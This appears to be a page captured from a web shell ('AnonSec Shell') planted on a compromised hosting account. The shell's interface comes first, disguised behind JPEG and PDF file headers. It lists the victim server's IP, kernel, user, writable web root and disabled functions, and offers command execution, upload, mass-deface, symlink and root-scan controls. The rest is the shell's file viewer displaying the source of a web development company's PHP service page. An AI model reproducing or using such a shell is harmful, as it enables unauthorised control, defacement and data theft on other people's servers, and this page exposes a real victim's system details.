ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 82.197.83.129  /  Your IP : 216.73.216.166   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64
User : u489457460 ( 489457460)
PHP Version : 7.3.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u489457460/domains/syoft.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u489457460/domains/syoft.com/public_html//fintech-web-development.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta name="facebook-domain-verification" content="ir06vclbv9f4wfpzkb8lawfhb3pay8" />
    <meta name="facebook-domain-verification" content="ir06vclbv9f4wfpzkb8lawfhb3pay8" />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
    <meta name="author" content="">
    <title>Fintech Web Development Services in India - Syoft</title>
    <meta name="description" content="Web App Development Services in India - Syoft ">
    <meta name="keywords" content="web application development services, web app development services, web application development company in India">
    <meta property="og:title" content="Web Application Development Services in India - Syoft">
    <meta property="og:description" content="Syoft is the best web app development services company in india. We are focused on creating scalable web applications delivering high-end solutions to our clients.">
    <meta property="og:keywords" content="web application development services, web app development services, web application development company in India">
    <meta property="og:url" content="https://syoft.com/web-app-development.php">
    <!-- <meta property="og:image" content="">
    <meta property="og:image:width" content="">
    <meta property="og:image:height" content=""> -->
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:site" content="@syoftofficial">
    <meta property="twitter:creator" content="@syoftofficial">
    <meta property="twitter:title" content="Web App Development Services in India - Syoft">
    <meta property="twitter:description" content=" Syoft is the best web application development services company in india. We are focused on creating scalable web applications delivering high-end solutions to our clients. ">
    <meta property="twitter:image" content="">
    <link rel="canonical" href="https:/www.syoft.com/web-app-development.php">
    <!-- Google Tag Manager -->
    <script>
        (function(w, d, s, l, i) {
            w[l] = w[l] || [];
            w[l].push({
                'gtm.start': new Date().getTime(),
                event: 'gtm.js'
            });
            var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s),
                dl = l != 'dataLayer' ? '&l=' + l : '';
            j.async = true;
            j.src =
                'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
            f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-PG7NV7J');
    </script>
    <!-- End Google Tag Manager -->

    <!--favicon icon-->
    <link rel="icon" href="assets/img/favicon.png" type="image/png" sizes="16x16">
    <!--title-->
    <!--google fonts-->
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700;800&family=Open+Sans:wght@400;600&display=swap" rel="stylesheet">
    <!--build:css-->
    <link rel="stylesheet" href="assets/css/main.css">
    <!-- endbuild -->
    <!--custom css start-->
    <link rel="stylesheet" href="assets/css/custom.css">
    <!--custom css end-->
    <!--  -->
    <!-- <style>
        body p,
        .display-5,
        .nav-item {
            font-family: montserrat !important;
            font-weight: none !important;
        }

        .main-menu li a.nav-link,
        .drop-title,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            font-family: montserrat !important;
            color: #000 !important;
            text-transform: none !important;
        }

        .btn {
            padding: .65rem 1.3rem !important;
            box-shadow: none !important;
        }

        .display-5 {
            letter-spacing: -1px;
        }

        .display-5 span {
            font-weight: 400;
        }

        .lead {
            color: #000;
            font-size: 17px !important;
            font-weight: 400 !important;
            line-height: 2;
        }

        .story-grid {
            height: 600px !important;
        }

        .story-item .fw-bold,
        .contact-form .fw-bold {
            font-weight: 500 !important;
        }

        .crm-service-box {
            border: 1px solid rgba(11, 22, 63, .12);
            padding: 40px 24px;
            -webkit-transition: all .3s ease-in-out;
            transition: all .3s ease-in-out;
        }

        .crm-service-box .icon-wrapper {
            width: 56px;
            height: 56px;
            background-color: rgba(239, 61, 61, .2);
            -webkit-transition: all .3s ease-in-out;
            transition: all .3s ease-in-out;
        }

        .crm-service-box:hover {
            -webkit-box-shadow: 10px 10px 50px rgb(2 0 91 / 10%);
            box-shadow: 10px 10px 50px rgb(2 0 91 / 10%);
            border-color: rgba(0, 0, 0, 0);
        }

        .crm-service-box:hover .icon-wrapper {
            background-color: #ef3d3d;
        }

        .crm-service-box:hover .icon-wrapper svg path {
            fill: #fff;
        }

        .hd-chat-box {
            background-color: #dc2f00;
            border-radius: 12px;
            padding: 40px 32px 0;
            /* margin-top: -60px; */
        }

        .read-more-link {
            font-weight: 600;
            font-family: "Poppins", sans-serif;
            font-size: .9375rem;
        }

        .hd-title h2 mark {
            color: #ff3d55;
            left: 0;
            bottom: -12px;
            width: 100%;
        }

        .faq-accordion .accordion-body {
            font-family: montserrat !important;
            font-size: 16px;
            color: #000;
        }

        .faq-accordion .accordion-item button {
            font-size: 20px !important;
            font-weight: 400 !important;
        }

        .faq-accordion .accordion-item button {
            padding: 1rem !important;
        }

        .accordion-button {
            background-color: #fff;
        }

        .hd-title.hd-border-right::after {
            content: "";
            position: absolute;
            right: -24px;
            top: 50%;
            -webkit-transform: translateY(-50%);
            transform: translateY(-50%);
            width: 1px;
            height: 120px;
            background-color: rgba(207, 207, 207, .5);
        }

        .text-lg-start {
            text-align: left !important;
        }

        .hd-htw-section mark .arrow-rounded,
        .hd-htw-section .mark .arrow-rounded {
            left: -12px;
            top: -3px;
            width: 140px;
        }

        .htw-single-box .number-serial {
            font-size: 90px;
            font-family: "Poppins", sans-serif;
            font-weight: 800;
            z-index: -1;
            right: 24px;
            top: 0;
            color: #dc2f00;
            line-height: 1.3em;
            opacity: .1;
        }

        .htw-single-box.mts-50 {
            margin-top: 50px;
        }

        .htw-single-box.mts-100 {
            margin-top: 100px;
        }

        .hd-htw-section .arrow-multiple {
            left: 280px;
            bottom: 0;
        }

        .margin-top {
            margin-top: -90px;
        }

        .htw-single-box h4 {
            font-size: 20px !important;
            font-weight: 400 !important;
            /* color: #dc2f00 !important; */
        }

        .htw-single-box .lead {
            font-size: 16px !important;
        }

        .feature-tab-list li a {
            font-family: montserrat !important;
            font-size: 17px !important;
            font-weight: 500 !important;
        }

        .service-two-column h3,
        .footer-single-col h3 {
            font-size: 20px !important;
            font-weight: 400 !important;
        }

        .footer-single-col h3 {
            border-bottom: 2px solid #000;
        }

        .footer-nav-list li a {
            font-size: 15px !important;
            font-weight: 400 !important;
        }

        .copyright-text p {
            font-weight: 400 !important;
            font-size: 15px !important;
            color: #000 !important;
        }

        .footer-social-list1 li a {
            font-weight: 400 !important;
            font-size: 15px !important;
            font-family: montserrat !important;
        }

        .footer-single-col p {
            color: #000 !important;
            font-weight: 400 !important;
            opacity: unset !important;
        }

        .footer-single-col p i {
            margin-right: 10px !important;
        }
    </style> -->
</head>

<body>
    <!-- Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PG7NV7J" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><!-- End Google Tag Manager (noscript) -->

    <!--preloader start-->
    <div id="preloader">
        <div class="preloader-wrap">
            <img src="assets/img/favicon.png" alt="web app development" class="img-fluid preloader-icon" />
            <div class="loading-bar"></div>
        </div>
    </div>
    <!--preloader end-->
    <!--main content wrapper start-->
    <div class="main-wrapper">
        <!--header section start-->
        <?php include 'header.php'; ?>
        <!--header section End-->
        <!--hero section start-->
        <section class="hero-section ptb-60" style="background: url('assets/img/shape/dot-dot-wave-shape.svg')no-repeat bottom center">
            <div class="container">
                <div class="row align-items-center justify-content-lg-between">
                    <div class="col-xl-6 col-lg-6">
                        <div class="hero-content-wrap text-center text-xl-start text-lg-start" data-aos="fade-right">
                            <!-- <h1 class="display-5">Search engine <span class="text-warning"> marketing</span></h1> -->
                            <h1 class="display-5"><span class="text-warning"> ✦ Fintech </span><br>Web Development Service</h1>
                            <p class="lead">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps.
                                So, irrespective of your industry, whether healthcare, commercial or educational, we can provide you with the best web app for your business
                            </p>
                            <div class="action-btns text-left pt-2 aos-init aos-animate" data-aos="fade-up" data-aos-delay="100">
                                <a href="contact-us.php" class="btn btn-primary me-lg-4 me-sm-4">Connect with expert</a>
                                <a href="#casestudies" class="btn btn-warning">Recent case studies</a>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-8 ">
                        <div class="hero-img position-relative circle-shape-images">
                            <img src="assets/img/banners/webapp-dev-b.png" alt="web app development" width="500" class="img-fluid position-relative z-5">
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!--hero section end-->

        <!-- <section class="why-choose-us pt-60 pb-120">
            <div class="container">
                <div class="row justify-content-lg-between justify-content-center align-items-center">
                    <div class="col-lg-5 col-md-7 order-1 order-lg-0">
                        <div class="why-choose-img position-relative">
                            <img src="assets/img/feature-hero-img-2.svg" class="img-fluid" alt="duel-phone">
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-12 order-0 order-lg-1">
                        <div class="why-choose-content">
                            <div class="mb-32">
                                <span class="crm-subtitle">Other high-quality <img src="assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span>
                                <h2 class="display-5">Web Development Services we Provide:</h2>
                            </div>
                            <ul class="list-unstyled d-flex flex-wrap list-two-col">
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Web Support and Maintenance</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>SaaS Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Web Portal Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Enterprise Web Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Fintech Web Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Responsive Web Design</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>Progressive Web App Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>WordPress Support</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>HTML5 Web Design & Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>eCommerce Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>B2B Portal Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>CMS Development</li>
                                <li class="py-1"><i class="fas fa-check-circle me-2 text-primary"></i>REST API Development</li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </section> -->
        <!-- <section class="why-us ptb-60" id="casestudies">
            <div class="container">
                <div class="row justify-content-center">
                    <div class="col-lg-10 col-md-10">
                        <div class="section-heading text-center mb-0">
                            <h2 class="display-5">Few of Our <span class="text-warning">Recent Works</span></h2>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-12">
                        <ul class="nav justify-content-center feature-tab-list mt-4" id="nav-tab" role="tablist">
                            <li class="nav-item">
                                <a class="nav-link active" href="#tab-1" data-bs-toggle="tab" data-bs-target="#tab-1" role="tab" aria-selected="true">Project 01</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" href="#tab-2" data-bs-toggle="tab" data-bs-target="#tab-2" role="tab" aria-selected="false">Project 02</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" href="#tab-3" data-bs-toggle="tab" data-bs-target="#tab-3" role="tab" aria-selected="false">Project 03</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" href="#tab-4" data-bs-toggle="tab" data-bs-target="#tab-4" role="tab" aria-selected="false">Project 04</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" href="#tab-5" data-bs-toggle="tab" data-bs-target="#tab-5" role="tab" aria-selected="false">Project 05</a>
                            </li>
                        </ul>
                        <div class="tab-content bg-primary text-white rounded-custom" id="nav-tabContent">
                            <div class="tab-pane fade show active" id="tab-1" role="tabpanel">
                                <div class="row justify-content-center text-center p-50 pb-0">
                                    <div class="col-lg-8">
                                        <div class="feature-tab-info">
                                            <p class="lead text-center text-white">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps</p>
                                            <a href="#" class="btn btn-danger text-decoration-none">Learn more</a>
                                        </div>
                                        <img src="assets/img/tab-feature-img-4.png" alt="web app development" class="img-fluid mt-5">
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade" id="tab-2" role="tabpanel">
                                <div class="row justify-content-center text-center p-50 pb-0">
                                    <div class="col-lg-8">
                                        <div class="feature-tab-info">
                                            <p class="lead text-center text-white">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps</p>
                                            <a href="#" class="btn btn-outline-primary text-decoration-none">Learn more</a>
                                        </div>
                                        <img src="assets/img/tab-feature-img-2.png" alt="web app development" class="img-fluid mt-5">
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade" id="tab-3" role="tabpanel">
                                <div class="row justify-content-center text-center p-50 pb-0">
                                    <div class="col-lg-8">
                                        <div class="feature-tab-info">
                                            <p class="lead text-center text-white">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps</p>
                                            <a href="#" class="btn btn-outline-primary text-decoration-none">Learn more</a>
                                        </div>
                                        <img src="assets/img/tab-feature-img-1.png" alt="web app development" class="img-fluid mt-5">
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade" id="tab-4" role="tabpanel">
                                <div class="row justify-content-center text-center p-50 pb-0">
                                    <div class="col-lg-8">
                                        <div class="feature-tab-info">
                                            <p class="lead text-center text-white">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps</p>
                                            <a href="#" class="btn btn-outline-primary text-decoration-none">Learn more</a>
                                        </div>
                                        <img src="assets/img/tab-feature-img-3.png" alt="web app development" class="img-fluid mt-5">
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade" id="tab-5" role="tabpanel">
                                <div class="row justify-content-center text-center p-50 pb-0">
                                    <div class="col-lg-8">
                                        <div class="feature-tab-info">
                                            <p class="lead text-center text-white">We at Syoft offer various web application development services for various industries. We are also committed to using best-in-practice methods of web app development and creating cutting-edge web apps</p>
                                            <a href="#" class="btn btn-outline-primary text-decoration-none">Learn more</a>
                                        </div>
                                        <img src="assets/img/tab-feature-img-5.png" alt="web app development" class="img-fluid mt-5">
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section> -->
        <section class="feature-section ptb-60 bg-primary  text-white">
            <div class="container">
                <div class="row justify-content-center">
                    <div class="col-lg-10 col-md-10">
                        <div class="section-heading text-center">
                            <span class="crm-subtitle">Case Studies <img src="assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span>
                            <h2 class="display-5  text-white">Few of Our <span class="text-warning">Recent Works</span></h2>
                            <!-- <p class="mb-0 lead text-center " style="line-height: 1.5 !important;">When appropriate PPC strategies are incorporated into the business, the sales will topple over and skyrocket. However, it is crucial to ensure the strategies feature excellent performance and can yield positive results over time.</p> -->
                        </div>
                    </div>
                </div>
                <div class="row align-items-center">
                    <div class="col-12">
                        <div id="carouselExampleInterval" class="carousel slide" data-bs-ride="carousel">
                            <div class="carousel-inner">
                                <div class="carousel-item active" data-bs-interval="10000">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-1.png" alt="" width="850" class="d-block" alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">SaaS Platform for Hotels</h2>
                                                <p class="lead">Eazyrooms is the best hotel management software that helps hotels enhance their guest experience. We delivered them a robust seamless Mobile and web application solutions.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Platforms Developed :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/android.svg" class="img-fluid" width="30" alt="user">
                                                            Android
                                                        </li>
                                                        <li class="nav-item platform">
                                                            <img src="assets/img/ios-white.svg" class="img-fluid" width="25" alt="user">
                                                            iOS
                                                        </li>
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            Web
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item" data-bs-interval="2000">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-6.png" alt="" width="850" class="d-block " alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">We build a Responsive Website for Homeopathic Practitioners</h2>
                                                <p class="lead">Registered Ontario Homeopaths mission is to promote, represent, and support professional homeopaths.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Service Offered :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            Website Development
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-5.png" alt="" width="850" class="d-block" alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">Recruiting Platform to Easily Source, Recruit, Manage & Hire</h2>
                                                <p class="lead">Zepul™️ aims to quickly, effectively, and economically link organizations with the right candidates and vice versa in order to facilitate and streamline the recruiting ecosystem.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Platforms developed :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/android.svg" class="img-fluid" width="30" alt="user">
                                                            Android
                                                        </li>
                                                        <li class="nav-item platform">
                                                            <img src="assets/img/ios-white.svg" class="img-fluid" width="25" alt="user">
                                                            iOS
                                                        </li>
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            Web
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-2.png" alt="" width="850" class="d-block" alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">Overseas Education & Migration Services</h2>
                                                <p class="lead">Blue Bliss Overseas Consultants is the one-stop solution for all international education & migration requirements. We helped them to launch a website and engage a Global audience.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Service Offered :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            Website Design and Development
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-3.png" alt="" width="850" class="d-block" alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">Hospitality Services</h2>
                                                <p class="lead">We helped them to build a website application to make easy Bookings & Orders.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Service Offered :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            Web Application
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="carousel-item">
                                    <div class="row align-items-center justify-content-lg-between px-3">
                                        <div class="col-lg-8">
                                            <img src="assets/img/portfolio/p-4.png" alt="" width="850" class="d-block" alt="...">
                                        </div>
                                        <div class="col-lg-4 text-dark">
                                            <div class="section-heading text-center text-xl-start text-lg-start mb-0" data-aos="fade-right">
                                                <h2 class="dispaly-5 text-white">CRM For Small Businesses</h2>
                                                <p class="lead">Worke is an integrated intelligent platform that consolidates and streamlines all your business operations crafted cleverly for small and medium businesses.</p>
                                                <div class="author-info mt-4">
                                                    <h6 class="mb-0 text-white">Service Offered :</h6>
                                                    <ul class="nav testimonial-tab-list mt-4" id="nav-tab" role="tablist">
                                                        <li class="nav-item">
                                                            <img src="assets/img/html.svg" class="img-fluid" width="30" alt="user">
                                                            SaaS Application
                                                        </li>
                                                    </ul>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleInterval" data-bs-slide="prev">
                                <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                                <span class="visually-hidden">Previous</span>
                            </button>
                            <button class="carousel-control-next" type="button" data-bs-target="#carouselExampleInterval" data-bs-slide="next">
                                <span class="carousel-control-next-icon" aria-hidden="true"></span>
                                <span class="visually-hidden">Next</span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </section>

        <!--integration section start-->
        <section class="integration-section ptb-60">
            <div class="container">
                <div class="row align-items-center justify-content-between">
                    <div class="col-lg-3">
                        <div class="integration-list-wrap">
                            <a href="#" class="integration-1" data-bs-toggle="tooltip" data-bs-placement="top" title="Joomla">
                                <img src="assets/img/blog/Joomla.png" alt="Joomla" class="img-fluid rounded-circle">
                            </a>
                            <a href="#" class="integration-2" data-bs-toggle="tooltip" data-bs-placement="top" title="Wordpress">
                                <img src="assets/img/blog/WordPress.png" alt="Wordpress" class="img-fluid rounded-circle">
                            </a>
                            <a href="#" class="integration-3" data-bs-toggle="tooltip" data-bs-placement="top" title="Magento">
                                <img src="assets/img/blog/magento.png" alt="Magento" class="img-fluid rounded-circle">
                            </a>
                            <a href="#" class="integration-4" data-bs-toggle="tooltip" data-bs-placement="top" title="Shopify">
                                <img src="assets/img/blog/shopify.png" alt="Shopify" class="img-fluid rounded-circle">
                            </a>
                            <a href="#" class="integration-5" data-bs-toggle="tooltip" data-bs-placement="top" title="Kubernetes">
                                <img src="assets/img/blog/kubernetes.png" alt="Kubernetes" class="img-fluid rounded-circle">
                            </a>
                            <a href="#" class="integration-6" data-bs-toggle="tooltip" data-bs-placement="top" title="Google Cloud">
                                <img src="assets/img/blog/googlecloud.png" alt="Google Cloud" class="img-fluid rounded-circle">
                            </a>
                        </div>
                    </div>
                    <div class="col-lg-6 col-12">
                        <div class="section-heading text-center my-5 my-lg-0 my-xl-0">
                            <span class="crm-subtitle">Technologies <img src="assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span>
                            <!-- <h4 class="text-warning h5">Technologies</h4> -->
                            <h2 class="display-5">We curate your dream software bundle like none other</h2>
                            <p class="text-center lead">Without any compromise on service quality, we work in synergy, keeping in mind, the best software solution for you.</p>
                            <!-- <a href="integrations.html" class="mt-4 btn btn-primary">View all Integration</a> -->
                        </div>
                    </div>
                    <div class="col-lg-3">
                        <div class="col-lg-4">
                            <div class="integration-list-wrap">
                                <a href="#" class="integration-7" data-bs-toggle="tooltip" data-bs-placement="top" title="Angular">
                                    <img src="assets/img/blog/Angular.png" alt="Angular" class="img-fluid rounded-circle">
                                </a>
                                <a href="#" class="integration-8" data-bs-toggle="tooltip" data-bs-placement="top" title="ReactJS">
                                    <img src="assets/img/blog/React.png" alt="ReactJS" class="img-fluid rounded-circle">
                                </a>
                                <a href="#" class="integration-9" data-bs-toggle="tooltip" data-bs-placement="top" title="Python">
                                    <img src="assets/img/blog/Python.png" alt="Python" class="img-fluid rounded-circle">
                                </a>
                                <a href="#" class="integration-10" data-bs-toggle="tooltip" data-bs-placement="top" title=".Net Core">
                                    <img src="assets/img/blog/net_core.png" alt=".Net Core" class="img-fluid rounded-circle">
                                </a>
                                <a href="#" class="integration-11" data-bs-toggle="tooltip" data-bs-placement="top" title="Apple">
                                    <img src="assets/img/blog/apple.png" alt="Apple" class="img-fluid rounded-circle">
                                </a>
                                <a href="#" class="integration-12" data-bs-toggle="tooltip" data-bs-placement="top" title="PostgreSQL">
                                    <img src="assets/img/blog/PostgreSQL.png" alt="PostgreSQL" class="img-fluid rounded-circle">
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <!--integration section end-->
        <!--blog section start-->
        <section class="home-blog-section ptb-60 bg-light ">
            <div class="container">
                <div class="row align-items-center justify-content-between">
                    <div class="col-lg-5 col-md-12">
                        <div class="section-heading" data-aos="fade-up">
                            <h4 class="text-primary h5"></h4>
                            <span class="crm-subtitle">Blog <img src="assets/img/shape/arro-right.svg" alt="arrow" class="ms-1"></span>
                            <h2>Check our Latest News and Update</h2>
                        </div>
                    </div>
                    <div class="col-lg-7 col-md-12">
                        <div class="text-lg-end mb-5 mb-lg-0" data-aos="fade-up">
                            <a href="blogs.php" class="btn btn-primary">View All Article</a>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-lg-4 col-md-6">
                        <div class="single-article rounded-custom mb-4 mb-lg-0" data-aos="fade-up" data-aos-delay="50">
                            <a href="blog-single.php" class="article-img">
                                <img src="assets/img/blog/blog-1.jpg" alt="article" class="img-fluid">
                            </a>
                            <div class="article-content p-4">
                                <div class="article-category mb-2 d-block">
                                    <a href="javascript:;" class="d-inline-block text-dark badge bg-warning-soft">Data Analytics</a>
                                </div>
                                <a href="blog-single.php">
                                    <h2 class="h5 article-title limit-2-line-text">Data analytics for healthcare costs in 2022</h2>
                                </a>
                                <a href="javascript:;">
                                    <div class="d-flex align-items-center pt-2 row blog-btn">
                                        <div class="avatar-info col-lg-7">
                                            <h6 class="mb-0 avatar-name">Dileep Kumar</h6>
                                            <span class="small fw-medium text-muted">December 20, 2022</span>
                                        </div>
                                        <div class="avatar-info-right col-lg-5">
                                            <button class="read btn btn-outline-dark btn-sm mt-2">Read more</button>
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6">
                        <div class="single-article rounded-custom mb-4 mb-lg-0" data-aos="fade-up" data-aos-delay="100">
                            <a href="blog-single.php" class="article-img">
                                <img src="assets/img/blog/blog-2.jpg" alt="article" class="img-fluid">
                            </a>
                            <div class="article-content p-4">
                                <div class="article-category mb-2 d-block">
                                    <a href="javascript:;" class="d-inline-block text-dark badge bg-primary-soft">Data Science</a>
                                </div>
                                <a href="blog-single.php">
                                    <h2 class="h5 article-title limit-2-line-text">Big Data in Manufacturing: Importance and Applications</h2>
                                </a>
                                <a href="javascript:;">
                                    <div class="d-flex align-items-center pt-2 row blog-btn">
                                        <div class="avatar-info col-lg-7">
                                            <h6 class="mb-0 avatar-name">Dileep Kumar</h6>
                                            <span class="small fw-medium text-muted">June 17, 2022</span>
                                        </div>
                                        <div class="avatar-info-right col-lg-5">
                                            <button class="read btn btn-outline-dark btn-sm mt-2">Read more</button>
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6">
                        <div class="single-article rounded-custom mb-0" data-aos="fade-up" data-aos-delay="150">
                            <a href="blog-single.php" class="article-img">
                                <img src="assets/img/blog/blog-3.jpg" alt="article" class="img-fluid">
                            </a>
                            <div class="article-content p-4">
                                <div class="article-category mb-2 d-block">
                                    <a href="javascript:;" class="d-inline-block badge bg-warning">Business Intelligence</a>
                                </div>
                                <a href="blog-single.php">
                                    <h2 class="h5 article-title limit-2-line-text">How Business Intelligence Helps the Retail Sector</h2>
                                </a>
                                <a href="javascript:;">
                                    <div class="d-flex align-items-center pt-2 row blog-btn">
                                        <div class="avatar-info col-lg-7">
                                            <h6 class="mb-0 avatar-name">Dileep Kumar</h6>
                                            <span class="small fw-medium text-muted">June 16, 2022</span>
                                        </div>
                                        <div class="avatar-info-right col-lg-5">
                                            <button class="read btn btn-outline-dark btn-sm mt-2">Read more</button>
                                        </div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section> <!--blog section end-->
        <section id="partner_section" class="related-links partner_section text-center ptb-60 deco_wrap clearfix">
            <div class="container">
                <div class="row justify-content-center">
                    <div class="col-lg-10 col-md-10">
                        <div class="section-heading text-center mb-0">
                            <h2 class="display-5">We are Featured in <span class="text-warning">Reputed News Media</span></h2>
                        </div>
                    </div>
                </div>
                <div class="crm-brands-row mt-4">
                    <div class="crm-brand-item">
